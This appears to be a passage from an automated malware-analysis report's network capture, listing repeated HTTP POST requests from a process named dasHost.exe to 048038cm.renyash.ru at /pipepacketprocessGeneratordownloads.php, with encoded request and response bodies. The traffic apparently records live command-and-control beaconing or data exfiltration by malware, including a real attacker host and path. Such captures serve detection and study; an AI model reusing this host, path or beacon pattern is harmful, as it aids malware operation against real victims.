                                                                        Dec 28, 2024 20:44:34.778687000 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:35.306447983 CET967INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:35 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3857Fv9kGn0vYtc%2B2ImMm485IV%2FJxPj3nuF2a91rSJ4ORAMEUHX7AkeH6g8EG8xhVmXRdm2WgM4ctxX%2FKHYedZAYM%2FIXNOMaDuioomcCXoGQ4pyIPGXBu5SQsfi5zOHdAkiYYnEj"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bb858ca42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8411&min_rtt=1677&rtt_var=7227&sent=852&recv=911&lost=0&retrans=2&sent_bytes=134090&recv_bytes=543618&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1d 28 0a 0f 01 37 05 06 52 24 02 2a 5f 2a 13 25 5a 28 23 2f 08 3d 5e 38 08 27 28 28 5f 2b 28 0c 44 33 59 2a 1d 21 04 37 0d 2a 3a 21 46 04 1e 22 04 23 2d 28 13 29 30 3d 56 29 3c 27 07 21 1e 1b 17 30 3a 0f 52 32 3b 3f 52 36 3f 24 08 24 02 01 1a 3b 0a 22 5c 3a 30 0b 54 32 14 2c 5e 0e 12 39 56 31 23 3d 5d 28 3b 29 58 26 20 3f 1d 31 38 22 00 27 05 27 56 21 2b 32 00 3c 09 28 0e 33 2f 0e 56 2d 05 06 06 27 39 33 0e 2a 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#(7R$*_*%Z(#/=^8'((_+(D3Y*!7*:!F"#-()0=V)<'!0:R2;?R6?$$;"\:0T2,^9V1#=](;)X& ?18"''V!+2<(3/V-'93*2!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:35.307409048 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:35.639939070 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:36.164700031 CET965INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uxcrTy01ddt6yKi0NeC5s26g%2Fkb%2BqmO0g9sdjLxUyYlsJwJMnWktq%2FQrLomNAbSl6meQQaN0HWgIx5ztidOvncj5P1OT287jrUY7OdSdOp3W7CODEVfJQ8Jraw7mHQ1SIkYJHqOf"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bbdbfa942cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8215&min_rtt=1677&rtt_var=6568&sent=858&recv=916&lost=0&retrans=2&sent_bytes=135082&recv_bytes=546024&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 53 3c 42 2e 58 37 38 37 0c 30 3f 2e 16 2b 3e 21 58 28 20 23 41 29 2b 2b 56 26 28 0a 13 2b 01 31 1d 24 2f 0f 0e 35 2e 38 11 3c 10 21 46 04 1e 21 5c 21 2e 24 5f 3e 33 29 1c 2b 2f 38 5a 36 23 25 5f 24 2a 31 57 27 2b 30 0c 22 02 01 13 27 12 3f 53 2c 0a 2e 5d 2e 23 2d 56 26 2e 2c 5e 0e 12 39 51 31 0e 26 04 3c 06 1b 59 27 56 34 09 26 02 3d 10 33 2b 33 13 20 06 31 15 2b 09 3b 1d 24 11 38 52 2d 28 38 06 24 39 23 09 3d 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#S<B.X7870?.+>!X( #A)++V&(+1$/5.8<!F!\!.$_>3)+/8Z6#%_$*1W'+0"'?S,.].#-V&.,^9Q1&<Y'V4&=3+3 1+;$8R-(8$9#=!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:36.165503025 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2088
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:36.733344078 CET965INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uxcrTy01ddt6yKi0NeC5s26g%2Fkb%2BqmO0g9sdjLxUyYlsJwJMnWktq%2FQrLomNAbSl6meQQaN0HWgIx5ztidOvncj5P1OT287jrUY7OdSdOp3W7CODEVfJQ8Jraw7mHQ1SIkYJHqOf"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bbdbfa942cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8215&min_rtt=1677&rtt_var=6568&sent=858&recv=916&lost=0&retrans=2&sent_bytes=135082&recv_bytes=546024&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 53 3c 42 2e 58 37 38 37 0c 30 3f 2e 16 2b 3e 21 58 28 20 23 41 29 2b 2b 56 26 28 0a 13 2b 01 31 1d 24 2f 0f 0e 35 2e 38 11 3c 10 21 46 04 1e 21 5c 21 2e 24 5f 3e 33 29 1c 2b 2f 38 5a 36 23 25 5f 24 2a 31 57 27 2b 30 0c 22 02 01 13 27 12 3f 53 2c 0a 2e 5d 2e 23 2d 56 26 2e 2c 5e 0e 12 39 51 31 0e 26 04 3c 06 1b 59 27 56 34 09 26 02 3d 10 33 2b 33 13 20 06 31 15 2b 09 3b 1d 24 11 38 52 2d 28 38 06 24 39 23 09 3d 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#S<B.X7870?.+>!X( #A)++V&(+1$/5.8<!F!\!.$_>3)+/8Z6#%_$*1W'+0"'?S,.].#-V&.,^9Q1&<Y'V4&=3+3 1+;$8R-(8$9#=!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:36.947771072 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:37.157984018 CET967INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EKwEzlFArgFPFbaWBZc8r38jVZzjMQYs5G4iLoRV%2BdUjfSyEbULhtl8G1M6fNGFj5hWep5N%2BWWgZcrUq2%2FNNfNadr4QW2tTHLLeXB4EN1J8nCetTGlH9ERWXLcIvv3oPSTkkN%2Bkj"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bc5e8cc42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=6705&min_rtt=1677&rtt_var=6314&sent=863&recv=920&lost=0&retrans=2&sent_bytes=136072&recv_bytes=548418&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0c 28 0a 08 5e 34 05 06 55 27 05 21 00 3e 3d 08 00 3d 09 37 40 29 16 24 08 26 16 24 5b 3c 01 2d 1b 24 3f 07 09 36 5b 27 0f 2a 3a 21 46 04 1e 21 5a 37 3d 30 12 3e 1d 0c 0a 2a 02 3c 5e 35 33 21 5d 24 5c 26 09 26 01 3c 0b 35 02 2f 1e 24 05 20 08 2f 34 22 16 2d 30 3d 57 32 3e 2c 5e 0e 12 39 53 25 33 25 5a 28 38 29 5c 27 33 23 1c 32 02 21 58 26 28 20 0d 23 3b 31 5f 2b 20 37 53 26 2f 28 10 39 3b 0a 00 24 3a 23 09 3d 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 (^4U'!>==7@)$&$[<-$?6['*:!F!Z7=0>*<^53!]$\&&<5/$ /4"-0=W2>,^9S%3%Z(8)\'3#2!X&( #;1_+ 7S&/(9;$:#="!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:37.159466982 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:37.491868019 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:38.021935940 CET967INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:37 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XPqoGviRdgAEde4rBK%2F7XSugVkigWikiKEuEAg7CD%2BJ1F3E5qVHrMgQ%2FZyR1aFTUln0k9qMObVOMwkAaAo2GRrWSDT9WIfWF2ibicOJZ82rV%2F2uM8cSa90DpyrDjAiuMWbAsld71"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bc95cc142cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=7841&min_rtt=1677&rtt_var=7969&sent=868&recv=925&lost=0&retrans=2&sent_bytes=137064&recv_bytes=550824&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0d 3c 0a 36 10 20 5d 30 56 30 3c 26 5f 29 13 36 03 29 0e 0d 0a 2a 38 24 08 26 3b 20 5e 28 16 2e 09 27 06 25 0e 35 04 34 1e 28 3a 21 46 04 1e 21 1e 34 00 3c 5e 3d 30 31 56 29 3f 38 5a 36 09 36 04 26 3a 03 52 26 38 2b 53 22 2c 02 08 30 02 3c 0b 2f 42 32 5b 2f 20 0b 1d 32 3e 2c 5e 0e 12 39 57 24 33 22 02 3f 38 36 01 24 56 3b 12 31 38 26 00 27 2b 01 13 20 16 0b 5e 3c 33 3b 55 27 2c 3f 0c 2e 3b 23 5e 33 39 02 13 2a 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 <6 ]0V0<&_)6)*8$&; ^(.'%54(:!F!4<^=01V)?8Z66&:R&8+S",0</B2[/ 2>,^9W$3"?86$V;18&'+ ^<3;U',?.;#^39*2!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:38.022661924 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:38.356234074 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:38.887120008 CET969INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:38 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cx52I5lz6aARjUw59HAWb4%2BLrbVvMysZ6jbfQk94IfokGnPg4SxfSbmP07Q1R%2FiI42Hklx2%2BQDDrS1ozngmmK7wApN7mBdG1md%2BBq5AKOOvvqw%2BnVeMJRBfECzELX9vxUsBwGtxE"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bceb9da42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8081&min_rtt=1677&rtt_var=7616&sent=874&recv=930&lost=0&retrans=2&sent_bytes=138056&recv_bytes=553230&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0c 28 27 29 03 20 02 2f 0d 27 3c 07 04 2a 2e 35 59 3d 20 02 1c 29 06 30 0d 25 38 38 59 3c 28 25 1b 27 11 00 56 20 3d 02 1f 3c 3a 21 46 04 1e 21 5d 23 07 30 5b 3e 0a 21 1c 2a 2c 01 03 35 09 2a 04 26 3a 04 0a 31 01 3f 52 22 2c 24 0c 30 2c 0d 50 38 37 2a 16 3a 33 22 0d 31 3e 2c 5e 0e 12 39 53 31 20 3a 02 3c 38 17 11 24 23 2b 50 27 3b 0f 1f 26 28 20 0d 20 06 39 5c 2b 33 23 55 24 3f 38 1f 3a 5d 24 05 24 07 20 54 2a 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 (') /'<*.5Y= )0%88Y<(%'V =<:!F!]#0[>!*,5*&:1?R",$0,P87*:3"1>,^9S1 :<8$#+P';&( 9\+3#U$?8:]$$ T*!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:38.889942884 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:39.222229004 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:39.748258114 CET969INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:39 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GQZpkOPENJYyP3WNhcQoYbLntg5gIOMQ%2BtI4Fz0EtwP853UfFlVHOtxrqwiMdc9Luz0OM2O0R9PngGdT%2Fi4A8SxC7XTCq7W%2B%2BuT0YEwB6sIjhahTD4%2BIUcGUoskHyBFIJ2azvaA4"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bd42fa442cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=9432&min_rtt=1677&rtt_var=9736&sent=880&recv=935&lost=0&retrans=2&sent_bytes=139050&recv_bytes=555636&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0f 2b 24 2a 10 20 05 34 11 24 3f 26 16 3d 04 39 13 2a 56 34 19 2b 38 19 51 31 38 3c 5f 3c 16 25 1a 24 3f 22 50 21 2d 20 57 2b 3a 21 46 04 1e 21 59 20 10 2c 5f 3d 33 29 52 29 3c 02 5d 22 1e 3e 06 24 14 3e 0e 31 3b 3b 10 36 3f 33 1d 33 05 30 0f 2d 34 31 02 2e 0e 0b 57 31 3e 2c 5e 0e 12 39 1b 25 1e 18 00 3c 38 18 04 27 20 16 0f 31 38 3a 00 30 5d 2c 09 37 3b 31 59 28 0e 34 0d 33 3f 38 56 2e 05 38 07 30 00 3f 0c 2a 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 +$* 4$?&=9*V4+8Q18<_<%$?"P!- W+:!F!Y ,_=3)R)<]">$>1;;6?330-41.W1>,^9%<8' 18:0],7;1Y(43?8V.80?*"!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:39.749033928 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2088
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:40.081526041 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:40.563740969 CET977INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:40 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ATjWPsg6kdH6Tz%2FxI8wRjcG9sU83DfrhDdNSc%2BOPk9Tv90gkVo8g3iK%2BzZiECR8NpHdBj6%2B3C4NV%2BnDvkQhihcOhLWMozmS%2BeHHxMF8n8qxxh4rZMxsPBvGqM%2BG9WgMJovdO%2B8Q"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bd98dbf42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10420&min_rtt=1677&rtt_var=10812&sent=885&recv=940&lost=0&retrans=2&sent_bytes=140044&recv_bytes=558030&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0e 28 24 39 06 20 05 09 0f 24 12 0c 5e 3e 2d 36 00 3d 09 23 09 29 16 15 1d 26 5e 20 59 3c 16 04 44 25 3f 31 0c 35 3d 28 1c 2b 00 21 46 04 1e 22 03 21 2e 2c 5f 3e 0d 22 0c 29 05 30 16 21 30 25 1a 27 14 39 52 27 28 24 0b 21 02 23 1e 30 3f 24 0b 2d 27 22 5d 2d 0e 0c 0d 32 14 2c 5e 0e 12 39 18 25 20 29 12 3c 3b 21 5c 33 20 2b 12 31 38 32 03 30 38 3b 55 34 28 26 07 3f 33 3b 53 33 06 38 52 2e 15 0d 5c 24 39 2b 0e 3d 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 ($9 $^>-6=#)&^ Y<D%?15=(+!F"!.,_>")0!0%'9R'($!#0?$-'"]-2,^9% )<;!\3 +18208;U4(&?3;S38R.\$9+="!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:40.564562082 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:40.983867884 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:41.409390926 CET969INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:41 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O3HDXv81ewANcIiVvmObBESTdZmNQ%2FRfbtJqZAP%2FV%2B3HGubQ0vA90G%2FW3DMoUelMU4Epz6dYNJK05NAkuUGIZ5vslL9Xn10MgduSa2crCbsimCTeLcrgaVEFBrL89g9fKtPycWeY"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bde9b1842cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10845&min_rtt=1677&rtt_var=10713&sent=889&recv=945&lost=0&retrans=2&sent_bytes=141046&recv_bytes=560436&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 10 3c 24 39 02 20 28 30 1c 24 02 32 15 3e 3d 2d 11 2a 09 3f 41 3d 16 30 09 25 01 38 5b 28 16 00 42 24 2f 39 0e 21 2e 38 54 3c 10 21 46 04 1e 22 01 20 3e 3c 5b 29 1d 03 53 3d 5a 24 5a 36 20 21 1a 24 3a 25 52 27 2b 3f 55 36 02 0d 1e 27 2f 27 50 2d 27 35 06 3a 30 21 56 31 3e 2c 5e 0e 12 39 18 26 0e 29 5b 28 01 21 58 27 20 19 50 25 05 2d 1f 33 2b 0d 51 37 5e 2d 16 3c 30 3c 0b 26 2f 01 0d 2c 3b 0d 58 33 07 34 55 3d 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#<$9 (0$2>=-*?A=0%8[(B$/9!.8T<!F" ><[)S=Z$Z6 !$:%R'+?U6'/'P-'5:0!V1>,^9&)[(!X' P%-3+Q7^-<0<&/,;X34U=!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:41.410557985 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:41.743081093 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:42.270488024 CET967INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:42 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yJdJtAqB8%2FxvhL3Hb69WdIpPj6xHIrAz8kngNjhFG5cjJdVT7LhKDz0ezD70lKmM8DMCJHjtfQ1R70zasZxegb6MzVZY36kA4ZIN7oyc37Ksu258hO9crY1bsFeKX7kL%2Ft%2B2HUOW"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940be3e8d642cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10864&min_rtt=1677&rtt_var=10044&sent=894&recv=950&lost=0&retrans=2&sent_bytes=142040&recv_bytes=562842&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 55 28 1d 35 02 37 05 2c 54 24 12 08 16 3d 13 0b 13 29 23 3f 09 29 06 2b 1c 32 38 2f 00 3c 16 2e 45 33 11 29 0c 21 3d 28 1f 2a 3a 21 46 04 1e 21 5d 20 00 0e 58 29 0d 2e 0a 29 5a 24 17 22 1e 1b 5f 24 29 21 56 32 01 30 0e 22 02 0e 0f 27 05 33 19 2d 37 36 19 39 1e 31 10 25 14 2c 5e 0e 12 39 53 25 56 3d 10 3c 28 3d 12 24 33 3c 0c 26 5d 25 5a 24 3b 30 0f 34 06 0b 1b 2b 23 27 54 24 2c 3f 0e 2d 02 3c 05 24 07 06 1d 2b 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#U(57,T$=)#?)+28/<.E3)!=(*:!F!] X).)Z$"_$)!V20"'3-7691%,^9S%V=<(=$3<&]%Z$;04+#'T$,?-<$+2!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:42.271317959 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2076
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:42.604046106 CET25INHTTP/1.1 100 Continue


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.449735104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:42:32.906918049 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:33.251089096 CET2584OUTData Raw: 53 50 59 54 53 41 55 5c 5d 5f 52 56 5a 50 58 59 57 5f 5f 5f 54 5c 55 46 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SPYTSAU\]_RVZPXYW___T\UFR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'??-"+Y4-(+]!="X)7:0>-_#Z"#,*<%\ ![(
                                                                        Dec 28, 2024 20:42:34.131967068 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:34.385126114 CET813INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:34 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6SS%2F00SiR5YDi7k30OpE%2BoIL1rAE7npxue02qOyQlXVMiGGePGjutyVFjSP2hmiQyO8iYCoJjopO4wS20qYdADlGZAFYhFh%2FlQdwX06msnJFxWHAu7jcU%2FYkwkaVl%2FKsK7%2F22m3q"}],"group":"cf-nel","max_age":604800}
